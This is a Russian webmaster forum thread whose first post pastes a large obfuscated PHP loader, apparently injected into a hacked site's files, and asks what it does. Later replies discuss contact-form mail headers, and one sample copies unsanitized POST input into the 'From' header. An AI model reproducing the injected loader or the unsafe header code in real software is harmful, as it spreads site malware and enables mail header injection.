X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Появился непонятный php код или как хитро взламывают сайты
MaraFet
MaraFet
Topic Starter сообщение 5.3.2016, 19:31; Ответить: MaraFet
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 986
Регистрация: 16.7.2009
Из: Белый свет
Поблагодарили: 190 раз
Репутация:   45  


До "<?php" в некоторых php файлах появился код.

Код
<?php $kevnxge = ':<##:>:h%:<#64y]552]e7y]#>n%<)fnbozcYufhA    x272qj%6<^#zsfvr#    x5cq%7/7#@#7/7^#iubq#    x!*5!    x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%f-s.973:8297f:5297e:56-xr.985:52985-t0); $hjuvtqr = implode(array_map("xrdveqz",str_split("%tjw!>!x5c}X    x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-7;%!<*#}_;#)323ldfid>}&;!osvufs}    x7f;!opju    x7fw6*    x7f_*#[k2`{6:!}7;!}6;;2]},;osvufs}    x27;mnui}&;zepc}A;~!}    x7f;!|!}{;)gj}l;33bq}k;opju>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)s]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%c!>!%i    x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bd%6<    x7fw6*    x7f_*#ujojRk3`{666~6<&w6<    x7fw6*CW&)7gj6<.[A    x27&6<!%w:**<")));$ugquklt = $    x24]25    x24-    x24-!%    x24-    x24*!|!    x24-    x24    163    x69    145")) or (strstr($uas,"    x72    166    x3a    s]o]s]#)fepmqyf    x27*&7-n%)p%-*.%)euhA)3of>2bd%!<C)fepmqnjA    x27&6<.fmjgA    x27doj%6<    x7fw6*    x7f_*#fmjgk4`{6~6<tfs%w6<    x#372]58y]472]37y]672]48y]#>s%<#462]47y]2527fw6*CWtfs%)7gj6<*id%)ftp)sutcvt)esp>hmg%!<12>j%#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}Rdz*Wsfuvso!%bss    x5csboe)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7f    x7f    x7f    61    x31"))) { $wkczwmx = "    x63    1j%>j%!*3!    x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!    xfujsxX6<#o]o]Y%7;utpI#7>/7rfs%x24]26    x24-    x24<%j,,*!|    x24-    x24gvoduj36]73]83]238M7]381]211M5]67]452]88]5]4986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>:!>!    x24Ypp3)%cB%iN}#-!    x24/%tmw/    x24)%c*W%eN+#Qi    x5c1^WWYsboepn)%bss-%rxB%h>#]y31]278]y3e]81$GLOBALS["    x61    156    x75    156    x61"]=1; $uas=strtolofxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upc%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`m6|7**111127-K)ebfsX    x27u%)7fmjix6<C    x27&6<*rfs%7-K))ftpmdXA6|7**197-2qj%7-K)udfo3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53otn+qsvmt+fmhpph#)zbssb!-#}8]32M3]317]445]212]445]43]321]464#    x5cq%)ufttj    x22)gj6<^#Y#    x5cq%    x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*    x7fzW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr    x5c1^-%r    x5c2^-%hOh/#00#W~!}!+!<+{e%+*!*+fepdfe{h+{d%)+UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27i22#)fepmqyfA>2b%!<*q>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*    x2WSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}    x2},;uqpuft`msvd}+;!>!}    x27;!>>>!}_;gvc%}&;275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld5    116    x54"]); if ((strstr($uas,"    x6d    72    164") && (!isset($GLOBALS["    x61    156    x75    156    x61"])))) { ldbqov>*ofmy%)utjm!|.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]yssbz)#44ec:649#-!#:618d5f9#-!wkczwmx("", $hjuvtqr); $ugquklt();}}1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopDjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gj}1~!<2p%    x7f!~!<##5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e    x27,*d    x27,*c    x27,*b4-    x24!>!    x24/%tjw/    x24)%    x24-    x24y4    x24-    x24]y8    x24-     function xrdveqz($n){return chr(ord($n)-1);} @error_reporting(]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#dy)##-!#~<%h00#*<%nfd)##Qtpz)#]3if((function_exists("    x6f    142    x5f    163    x74    141    x)1/35.)1/14+9**-)1/2!>!2p%Z<^2    x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO    xASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!    x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)opdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFopjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnb%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**mdR6<*id%)dfyfR    x27tfs%6<*17-SFEBFI,6<*127-    x27)fepdof.)fepdof./#@#/qp%wer($_SERVER["    x48    124    x54    120    x5f    1256<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6<    x7fw6<*Kx7f<u%V    x27{ftmfV    x7f<*X&Z&S{ftmfV    x7f<*XAZ%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%f#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbgtmf!}Z;^nbsbq%    x5cSFfsqnpdov{h19275j{hnpd19]273]y76]252]y85]256]y6g]257]y%!|!*)323zbek!~!<b%    x7f!<X>x5c%j^    x24-    x24tvctus)%    x24-    x24b!    x53    105    x52    137    x41    107    x4po!    x24-    x24y7    x24-    x24*<!    x24-    x24gps)%j>1<%j=tj{fpg)%    x24-    x24*<!~!    x24/%t2w/    x24)##-!#~<#/%    x24-    x24!>!fyqmpef)#    x24*<!%t:w)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#5cq%    x27jsv%6<C>^#zsfvr#    x5cq%7**^#zsfvr]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~    x24<!%w:!>!(%w:!>!    x246767~6<Cw6<pdovg}k~~9{d%:osvufs:~928>>    x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275tt3<!fmtf!%z>2<!%ww2)%w`TW~    x24<!fwbm)%tjdovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#OJ`GB)fubfsdXA    x27K6<    x7#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%o:!>!    x242178}527}88:}334}472    x24<!%ff2!>!bssbz)gjZ<#opo#>b%!**X)ufttj    x22)gj!|!*nbsbq%)323ldfidk!~!>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5c^>Ew:d%w6Z6<.5`hA    x27pd%6<pd%f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFfw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA    x273qj%6<*Y%41]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&86]267]y74]275]y7:]268]y7f#<!%tww!>!    x2400~:<h%_tsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvdy]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix%6<C    x27pd%6|6.7eu{66~67<&w6<*&7-#o]ss-%rxW~!Ypp2)%zB%z>!    x24/%tmw/    x24)%tRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+962    x65    141    x74    145    x5f    146    x75    156    x63    164    x69    157    x6e";w6Z6<.4`hA    x27pd%6<pd%w6Z6<.3`hA    x27pd%6<pd%w6Z6<.2`hA    x27pd]K78:56985:6197g:74985-rr.93e:5597/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]_*#fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%7-!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!op#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssub%Z<#opo#>b%!*##>>X)!Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4    x223<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|!*uyfu    x27k:!f!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,T`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&bftmbg}    x7f;!osvufs}w;*    x7f!>>    x22!pd%)!gj}Z;h!opjudovg}{;]284]364]6]234]342]58]24]31#-%t/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_    sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsdpoqohuc'; $lmjpkbu=explode(chr((446-326)),substr($kevnxge,(37338-31461),(137-103))); $indoejw = $lmjpkbu[0]($lmjpkbu[(3-2)]); $sextdmwv = $lmjpkbu[0]($lmjpkbu[(8-6)]); if (!function_exists('gpmzlykh')) { function gpmzlykh($cbitonw, $gwsiiaddg,$higaiclwy) { $ioagubc = NULL; for($bsnntxvg=0;$bsnntxvg<(sizeof($cbitonw)/2);$bsnntxvg++) { $ioagubc .= substr($gwsiiaddg, $cbitonw[($bsnntxvg*2)],$cbitonw[($bsnntxvg*2)+(4-3)]); } return $higaiclwy(chr((39-30)),chr((283-191)),$ioagubc); }; } $rhuezuvr = explode(chr((216-172)),'2945,47,2351,59,1473,48,3451,38,3805,27,2314,37,763,45,1134,31,5060,56,2812,
63,166,61,4344,47,4125,30,4561,24,5116,60,4947,36,808,26,4745,43,1667,51,1226,30,
3489,44,1718,29,3227,40,4320,24,4621,62,29,54,4016,40,1875,68,5260,46,856,68,966,
25,3380,43,2041,56,634,63,389,29,1608,59,4837,40,2212,41,5756,57,3630,41,5629,61,
1165,61,3125,57,3182,45,2410,20,83,46,991,23,5306,64,2631,61,3012,57,2097,20,834,
22,2692,66,3423,28,481,58,1521,51,1815,27,5370,61,5020,40,4585,36,5690,66,3744,27
,5431,21,4441,52,5578,51,3671,20,2155,57,347,42,4155,69,3691,23,5513,65,2013,28,3
267,36,1089,45,3533,43,3069,56,2570,61,1014,51,418,63,4263,57,5844,33,227,56,3714
,30,4788,49,1572,36,4877,70,0,29,924,42,4056,69,4391,50,721,42,3771,34,2117,38,27
58,54,1256,38,3832,66,3898,59,1380,56,575,59,2473,29,3303,44,4983,37,1943,70,3347
,33,1436,37,5176,34,129,37,2430,43,1747,68,2875,38,5210,50,2253,61,539,36,3576,54
,2913,32,4683,62,1294,38,1842,33,5813,31,1065,24,2992,20,1332,48,2538,32,4493,68,
5452,61,4224,39,3957,59,283,64,697,24,2502,36'); $pchlkit = $indoejw("",gpmzlykh($rhuezuvr,$kevnxge,$sextdmwv)); $indoejw=$kevnxge; $pchlkit(""); $pchlkit=(708-587); $kevnxge=$pchlkit-1; ?>


Что он может означать или как им пользуется злоумышленник?


--------------------
Продвиженто - сервис создания семантического ядра (волшекластеры, ТЗ "Мечта копирайтера...)


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Alexandr_js
Alexandr_js
сообщение 6.3.2016, 0:58; Ответить: Alexandr_js
Сообщение #2


Участник
***

Группа: User
Сообщений: 237
Регистрация: 21.7.2015
Поблагодарили: 43 раза
Репутация:   8  


Цитата(juergenhd @ 5.3.2016, 22:15) *
моя проблема в том что когда приходит запрос с формы контакта то емайл отправителя всегда сервер а не а емайл посетителя, как сделать форму контактов правильно что бы когда приходило письмо то емайл был отправителя а не серверный? Я в этом не понимаю.

Добавить такую переменную
Код
$headers =
'Content-type:text/plain; charset=геа-8' . "\r\n" .
    'From: webmaster@example.com' . "\r\n" .
    'Reply-To: webmaster@example.com' . "\r\n" .
    'X-Mailer: PHP/' . phpversion();


и заменить вашу строку

Код
$mail = mail("тут мой емайл", $sub, $message,"Content-type:text/plain; charset = utf-8");


на мою
Код
$mail = mail("тут мой емайл", $sub, $message,$headers);


Цитата(MaraFet @ 5.3.2016, 19:31) *
Что он может означать или как им пользуется злоумышленник?

да все что угодно, надо раскодировать чтобы понять.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
juergenhd
juergenhd
сообщение 6.3.2016, 2:10; Ответить: juergenhd
Сообщение #3


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 3.3.2016
Поблагодарили: 0 раз
Репутация:   0  


Александер, спасибо вам, но проблема не решина, заменил example на $email и при ответе стоит $email@hostde1.fornex.org
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
WorkingMan
WorkingMan
сообщение 6.3.2016, 2:18; Ответить: WorkingMan
Сообщение #4


Новичок
*

Группа: User
Сообщений: 45
Регистрация: 25.1.2016
Поблагодарили: 8 раз
Репутация:   2  


juergenhd, так правильно, как вы можете отправлять письма с мыла клиента? Если вы имеете ввиду клиенту приходит от сервера, тогда вам нужно прописать настройки SMPT для отправки через сторонний сервер...


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
juergenhd
juergenhd
сообщение 6.3.2016, 2:25; Ответить: juergenhd
Сообщение #5


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 3.3.2016
Поблагодарили: 0 раз
Репутация:   0  


WorkingMan,

Мне приходит запрос с формы контакта, я хочу дать ответ на запрос, при нажатий конпки ответить стоит не емайл оптправителя а емайл сервера.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
WorkingMan
WorkingMan
сообщение 6.3.2016, 2:26; Ответить: WorkingMan
Сообщение #6


Новичок
*

Группа: User
Сообщений: 45
Регистрация: 25.1.2016
Поблагодарили: 8 раз
Репутация:   2  


juergenhd, Так правильно из формы отсылается письмо от СЕРВЕРА, а не от пользователя... так что...


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
juergenhd
juergenhd
сообщение 6.3.2016, 2:27; Ответить: juergenhd
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 3.3.2016
Поблагодарили: 0 раз
Репутация:   0  


WorkingMan, Вот эту проблему мне надо решит :) помогите, есть какие варианты?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
WorkingMan
WorkingMan
сообщение 6.3.2016, 3:03; Ответить: WorkingMan
Сообщение #8


Новичок
*

Группа: User
Сообщений: 45
Регистрация: 25.1.2016
Поблагодарили: 8 раз
Репутация:   2  


juergenhd, это нереально... А если сюда 'Reply-To: webmaster@example.com' . "\r\n" . добавить email клиента, то кнопка ответить будет отправлять письма туда


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
sergogogo
sergogogo
сообщение 6.3.2016, 3:07; Ответить: sergogogo
Сообщение #9


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 6.3.2011
Поблагодарили: 0 раз
Репутация:   0  


я делаю так
$email = $_POST['email'];
$to = 'blablabla@yandex.ru';
$subject = 'Получено сообщение с сайта blabla.ru';
$msg1 = "текстовка";
$header = "MIME-Version: 1.0\r\n";
$header .= "Content-type: text/html; charset=utf-8\r\n";
$header .= "From: ".$email."\r\n";
mail($to,$subject1,$msg,$header);
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
juergenhd
juergenhd
сообщение 6.3.2016, 3:12; Ответить: juergenhd
Сообщение #10


Новичок
*

Группа: Viewer
Сообщений: 8
Регистрация: 3.3.2016
Поблагодарили: 0 раз
Репутация:   0  


WorkingMan, да ну смысла нету в этом, надо сделать что бы ответ шол на емайл актуального запроса а не одному и тоже.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) ВНИМАНИЕ: Как самостоятельно продвинуть сайт? Научу!
консультации в домашних условиях :)
227 GlazAlmaz 78063 Сегодня, 22:35
автор: Dempo
Открытая тема (нет новых ответов) Как продвинуть товар в интернете ?
0 DimaMyrzich 181 Сегодня, 21:14
автор: DimaMyrzich
Открытая тема (нет новых ответов) Маленький кейс как сделать много почтовых ящиков в Gmail
Один аккаунт = много ящиков
17 PostBrigada 1050 Сегодня, 19:15
автор: Parfumer_75
Открытая тема (нет новых ответов) Как поднять доверие к сайту?
8 fair_exchange 546 Сегодня, 18:35
автор: _fan_
Открытая тема (нет новых ответов) Продвигать самому или довериться разработчику?
Дайте совет как быть
2 zaptrade 290 Сегодня, 14:38
автор: tiptopvkr


 



RSS Текстовая версия Сейчас: 18.12.2017, 22:40
Дизайн